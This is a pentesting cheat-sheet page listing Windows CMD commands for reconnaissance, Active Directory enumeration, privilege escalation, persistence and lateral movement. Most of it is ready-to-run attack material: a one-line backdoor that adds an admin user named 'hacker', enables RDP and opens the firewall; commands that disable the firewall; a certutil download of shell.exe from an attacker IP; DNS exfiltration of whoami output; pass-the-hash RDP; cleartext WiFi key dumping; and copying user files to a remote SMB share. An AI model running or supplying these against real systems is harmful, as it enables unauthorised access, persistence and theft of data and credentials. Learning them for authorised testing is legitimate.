100+ Windows CMD Commands

Become VeryLazyTech member! 🎁
Follow us on:
- ✖ Twitter @VeryLazyTech.
- 👾 Github @VeryLazyTech.
- 📜 Medium @VeryLazyTech.
- 📺 YouTube @VeryLazyTech.
- 📩 Telegram @VeryLazyTech.
- 🕵️‍♂️ My Site @VeryLazyTech.
Visit our shop for e-books and courses. 📚

When it comes to penetration testing and ethical hacking, Windows Command Prompt (CMD) is still one of the most underrated yet powerful hacking tools. While PowerShell gets most of the attention, CMD remains a goldmine for red teamers, pentesters, and hackers who want quick, stealthy, and effective results.

In this ultimate guide, I’ll walk you through all the essential CMD commands you need to master — from system reconnaissance to domain enumeration, privilege escalation, persistence, and lateral movement.

This is your one-stop Windows CMD cheat sheet for hackers. Bookmark it, practice it, and use it in your next red team engagement.

🖥️ System Information (Recon)

Gathering system details is the first step in any pentest or exploit chain.

wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE%   #Get architecture
systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"         #Get only OS info
wmic computersystem LIST full                                #PC info
wmic qfe get Caption,Description,HotFixID,InstalledOn        #Patches
wmic qfe list brief                                          #Updates
hostname                                                     #Get hostname
DRIVERQUERY                                                  #Drivers (potentially vulnerable)

🌍 Environment Variables

Environment variables can leak usernames, domains, and controllers useful for exploitation.

set   #List all environment variables

Important ones:

COMPUTERNAME → Computer name
USERNAME → Current user
USERDOMAIN / USERDNSDOMAIN → Domain info
LOGONSERVER → Domain controller
HOMEPATH / USERPROFILE → Home directory

nslookup %LOGONSERVER%.%USERDNSDOMAIN%

💾 Mounted Disks

(wmic logicaldisk get caption 2>nul | more) || (fsutil fsinfo drives 2>nul)
wmic logicaldisk get caption,description,providername

🛡️ Windows Defender & Recycle Bin

dir C:\$Recycle.Bin /s /b

⚙️ Processes, Services & Installed Software

schtasks /query /fo LIST /v
tasklist /V
tasklist /SVC
net start
wmic service list brief
sc query
dir /a "C:\Program Files"
dir /a "C:\Program Files (x86)"
reg query HKEY_LOCAL_MACHINE\SOFTWARE

🏢 Active Directory & Domain Enumeration

Domain Info

echo %USERDOMAIN% #Get domain name
echo %USERDNSDOMAIN% #Get domain name
echo %logonserver% #Get name of the domain controller
set logonserver #Get name of the domain controller
set log #Get name of the domain controller
gpresult /V # Get current policy applied
wmic ntdomain list /format:list #Displays information about the Domain and Domain Controllers

Users

dsquery user #Get all users
net user /domain #List all users of the domain
net user <ACCOUNT_NAME> /domain #Get information about that user
net accounts /domain #Password and lockout policy
wmic useraccount list /format:list #Displays information about all local accounts and any domain accounts that have logged into the device
wmic /NAMESPACE:\\root\directory\ldap PATH ds_user GET ds_samaccountname #Get all users
wmic /NAMESPACE:\\root\directory\ldap PATH ds_user where "ds_samaccountname='user_name'" GET # Get info of 1 users
wmic sysaccount list /format:list # Dumps information about any system accounts that are being used as service accounts.

#Me
whoami /all #All info about me, take a look at the enabled tokens
whoami /priv #Show only privileges

# Local users
net users #All users
dir /b /ad "C:\Users"
net user %username% #Info about a user (me)
net accounts #Information about password requirements
wmic USERACCOUNT Get Domain,Name,Sid
net user /add [username] [password] #Create user

# Other users looged
qwinsta #Anyone else logged in?

#Lauch new cmd.exe with new creds (to impersonate in network)
runas /netonly /user<DOMAIN>\<NAME> "cmd.exe" ::The password will be prompted

#Check current logon session as administrator using logonsessions from sysinternals
logonsessions.exe
logonsessions64.exe

Groups

net group /domain #List of domain groups
net localgroup administrators /domain #List uses that belongs to the administrators group inside the domain (the group "Domain Admins" is included here)
net group "Domain Admins" /domain #List users with domain admin privileges
net group "domain computers" /domain #List of PCs connected to the domain
net group "Domain Controllers" /domain #List PC accounts of domains controllers
wmic group list /format:list # Information about all local groups
wmic /NAMESPACE:\\root\directory\ldap PATH ds_group GET ds_samaccountname #Get all groups
wmic /NAMESPACE:\\root\directory\ldap PATH ds_group where "ds_samaccountname='Domain Admins'" Get ds_member /Value #Members of the group
wmic path win32_groupuser where (groupcomponent="win32_group.name="domain admins",domain="DOMAIN_NAME"") #Members of the group

#Local
net localgroup #All available groups
net localgroup Administrators #Info about a group (admins)
net localgroup administrators [username] /add #Add user to administrators

#Domain
net group /domain #Info about domain groups
net group /domain <domain_group_name> #Users that belongs to the group

Computers & Trusts

dsquery computer #Get all computers
net view /domain #Lis of PCs of the domain
nltest /dclist:<DOMAIN> #List domain controllers
wmic /NAMESPACE:\\root\directory\ldap PATH ds_computer GET ds_samaccountname #All computers
wmic /NAMESPACE:\\root\directory\ldap PATH ds_computer GET ds_dnshostname #All computers
# Trust relations
nltest /domain_trusts #Mapping of the trust relationships

# Get all objects inside an OU
dsquery * "CN=Users,DC=INLANEFREIGHT,DC=LOCAL"

📜 Logs & Event Queries

wevtutil qe security /rd:true /f:text

👤 Users & Groups

whoami /all
net users
net user %username%
net accounts
qwinsta   #See who’s logged in

Persistence tricks:

# Add domain user and put them in Domain Admins group
net user username password /ADD /DOMAIN
net group "Domain Admins" username /ADD /DOMAIN

# Add local user and put them local Administrators group
net user username password /ADD
net localgroup Administrators username /ADD

# Add user to insteresting groups:
net localgroup "Remote Desktop Users" UserLoginName  /add
net localgroup "Debugger users" UserLoginName /add
net localgroup "Power users" UserLoginName /add

🌐 Networking & Firewall

ipconfig /all #Info about interfaces
route print #Print available routes
arp -a #Know hosts
netstat -ano #Opened ports?
type C:\WINDOWS\System32\drivers\etc\hosts
ipconfig /displaydns | findstr "Record" | findstr "Name Host"

Firewall rules:

netsh firewall show state # FW info, open ports
netsh advfirewall firewall show rule name=all
netsh firewall show config # FW info
Netsh Advfirewall show allprofiles

NetSh Advfirewall set allprofiles state off  #Turn Off
NetSh Advfirewall set allprofiles state on  #Trun On
netsh firewall set opmode disable #Turn Off

#How to open ports
netsh advfirewall firewall add rule name="NetBIOS UDP Port 138" dir=out action=allow protocol=UDP localport=138
netsh advfirewall firewall add rule name="NetBIOS TCP Port 139" dir=in action=allow protocol=TCP localport=139
netsh firewall add portopening TCP 3389 "Remote Desktop"

#Enable Remote Desktop
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh firewall add portopening TCP 3389 "Remote Desktop"
::netsh firewall set service remotedesktop enable #I found that this line is not needed
::sc config TermService start= auto #I found that this line is not needed
::net start Termservice #I found that this line is not needed

#Enable Remote Desktop with wmic
wmic rdtoggle where AllowTSConnections="0" call SetAllowTSConnections "1"
##or
wmic /node:remotehost path Win32_TerminalServiceSetting where AllowTSConnections="0" call SetAllowTSConnections "1"

#Enable Remote assistance:
reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fAllowToGetHelp /t REG_DWORD /d 1 /f
netsh firewall set service remoteadmin enable

#Ninja combo (New Admin User, RDP + Rassistance + Firewall allow)
net user hacker Hacker123! /add & net localgroup administrators hacker /add & net localgroup "Remote Desktop Users" hacker /add & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f & netsh firewall add portopening TCP 3389 "Remote Desktop" & netsh firewall set service remoteadmin enable

::Connect to RDP (using hash or password)
xfreerdp /u:alice /d:WORKGROUP /pth:b74242f37e47371aff835a6ebcac4ffe /v:10.11.1.49
xfreerdp /u:hacker /d:WORKGROUP /p:Hacker123! /v:10.11.1.49

Enable Remote Desktop:

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

📡 Shares & WiFi

net view
net share
net use x: \\computer\share
netsh wlan show profile
netsh wlan show profile <SSID> key=clear

📥 File Download via LOLBAS

bitsadmin /create 1
certutil.exe -urlcache -split -f "http://10.10.14.13:8000/shell.exe" s.exe

🔐 Credentials & Passwords

cmdkey /list
vaultcmd /listcreds:"Windows Credentials" /all
rundll32 keymgr.dll, KRShowKeyMgr

🧨 Misc Exploitation Tricks

Hide files:

attrib +h file

Alternate Data Streams (ADS):

dir /r more file.txt:ads.txt

Obfuscation:

git clone https://github.com/danielbohannon/Invoke-DOSfuscation.git

Manual DNS exfil:

for /f %a in ('whoami') do nslookup %a <IP>

General commands:

cd #Get current dir
cd C:\path\to\dir #Change dir
dir #List current dir
dir /a:h C:\path\to\dir #List hidden files
dir /s /b #Recursive list without shit
time #Get current time
date #Get current date
shutdown /r /t 0 #Shutdown now
type <file> #Cat file

#Runas
runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe" #Use saved credentials
runas /netonly /user:<DOMAIN>\<NAME> "cmd.exe" ::The password will be prompted

#Hide
attrib +h file #Set Hidden
attrib -h file #Quit Hidden

#Give full control over a file that you owns
icacls <FILE_PATH> /t /e /p <USERNAME>:F
icacls <FILE_PATH> /e /r <USERNAME> #Remove the permision

#Recursive copy to smb
xcopy /hievry C:\Users\security\.yawcam \\10.10.14.13\name\win

#exe2bat to transform exe file in bat file

#ADS
dir /r #Detect ADS
more file.txt:ads.txt #read ADS
powershell (Get-Content file.txt -Stream ads.txt)

# Get error messages from code
net helpmsg 32 #32 is the code in that case

Learn & practice For the Bug Bounty

Support VeryLazyTech 🎉

Become VeryLazyTech member! 🎁
Follow us on:
- ✖ Twitter @VeryLazyTech.
- 👾 Github @VeryLazyTech.
- 📜 Medium @VeryLazyTech.
- 📺 YouTube @VeryLazyTech.
- 📩 Telegram @VeryLazyTech.
- 🕵️‍♂️ My Site @VeryLazyTech.
Visit our shop for e-books and courses. 📚

PreviousPractical Windows Commands NextFTP - Port 21

Last updated 5 months ago

Was this helpful?

hashtag🖥️ System Information (Recon)

hashtag🌍 Environment Variables

hashtag💾 Mounted Disks

hashtag🛡️ Windows Defender & Recycle Bin

hashtag⚙️ Processes, Services & Installed Software

hashtag🏢 Active Directory & Domain Enumeration

hashtagDomain Info

hashtagUsers

hashtagGroups

hashtagComputers & Trusts

hashtag📜 Logs & Event Queries

hashtag👤 Users & Groups

hashtag🌐 Networking & Firewall

hashtag📡 Shares & WiFi

hashtag📥 File Download via LOLBAS

hashtag🔐 Credentials & Passwords

hashtag🧨 Misc Exploitation Tricks